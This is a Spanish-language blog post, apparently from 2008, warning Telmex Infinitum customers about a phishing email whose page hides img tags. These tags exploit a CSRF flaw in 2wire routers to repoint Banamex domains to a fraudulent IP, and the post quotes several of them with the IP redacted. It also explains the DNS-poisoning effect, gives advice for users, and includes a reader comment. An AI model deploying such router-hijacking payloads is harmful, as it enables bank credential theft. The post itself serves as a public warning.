Nuevo tipo de phishing ataca a clientes de Prodigy Infinitum
El dia de ayer recibi un correo de phising con una tarjeta de gusanito.com. Esto no seria nada sorprendente si no fuera por el nuevo metodo que estas personas estan utilizando.
Al hacer clic en el link fraudulento, me llevaba a una pagina de lo que parecia ser una tarjeta de gusanito.com comun y corriente. Al revisar el codigo tenia unas lineas similares a estas (detalles peligrosos omitidos)
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=[IPDELSITIOFRAUDULENTO] "><br><img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=[IPDELSITIOFRAUDULENTO] "><br><img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=banamex.com.mx&ADDR=[IPDELSITIOFRAUDULENTO] "><br><img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=www.banamex.com.mx&ADDR=[IPDELSITIOFRAUDULENTO] "><br><img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=www.bancanetempresarial.banamex.com.mx&ADDR=[IPDELSITIOFRAUDULENTO] "><br><img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=bancanetempresarial.banamex.com.mx&ADDR=[IPDELSITIOFRAUDULENTO] "><br><img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=boveda.banamex.com&ADDR=[IPDELSITIOFRAUDULENTO] ">
Entre otras lineas similares. Estas lineas hacen uso de una vulnerabilidad de tipo CSRF de los routers 2wire inalambricos que son los que telmex regala a sus suscriptores de infinitum.
Lo que esta vulnerabilidad provoca, es que hace un cambio a los dns del router (AFAIK, no tengo un modem 2wire para probar ahora mismo) para que cada vez que alguien accese a la banca en linea de banamex, en realidad entres al sitio fraudulento. Basicamente usa la CSRF para realizar un DNS poisoning. Y ni tu navegador, ni tu antivirus, ni tu firewall se darian cuenta. Seria transparante para el usuario.
Esta vulnerabilidad es especialmente peligrosa porque no es necesario que el usuario ejecute ningun archivo, ni que baje nada. Simplemente entrando a la pagina o si su lector de correo muestra la imagen, el daño estaria hecho.
Como siempre, se recomienda que no abran correos que no estan esperando o de gente que no conozcan y usen un cliente de correo decente como thunderbird, que avisa cuando el texto del enlace no coincide con el enlace mismo. Ademas cambiene la contraseña a su router, revisen periodicamente su configuracion o de plano cambien de router. Con esta vulnerabilidad se puede cambiar toda la configuracion del router. Desde cambiar la contraseña de administrador, activar o desactivar el wireless, activar o desactivar el firewall, etc.
Mas informacion de la vulnerabilidad aqui: http://securityreason.com/securityalert/3026
Si deseas contactarme puedes hacerlo en contacto@masio.com.mx o deja comentario en alguna de las entradas del blog. Tambien me encuentras en twitter en 
o deja comentario en alguna de las entradas del blog. Tambien me encuentras en twitter en
Pep
2 Jan, 2008
Yo si tengo un módem de esos… y ya me paso.
La vulnerabilidad existe y es aprovechada exitosamente por este ataque.
Lo mas desconcertante es que esta muy bien documentado (a raíz de esto he hecho una búsqueda y halle info en muchos sitios) pero 2wire insiste en minimizar la vulnerabilidad.
No soy un experto en el tema, pero supongo que es el tipo de problemas que se pueden arreglar con una actualizacion de firmware… misa que sigue sin publicarse por parte de 2wire. Telmex también debería ejercer presión en ese sentido ya que estaría protegiendo a sus no pocos suscriptores, poniéndose la mascara de “buena onda”.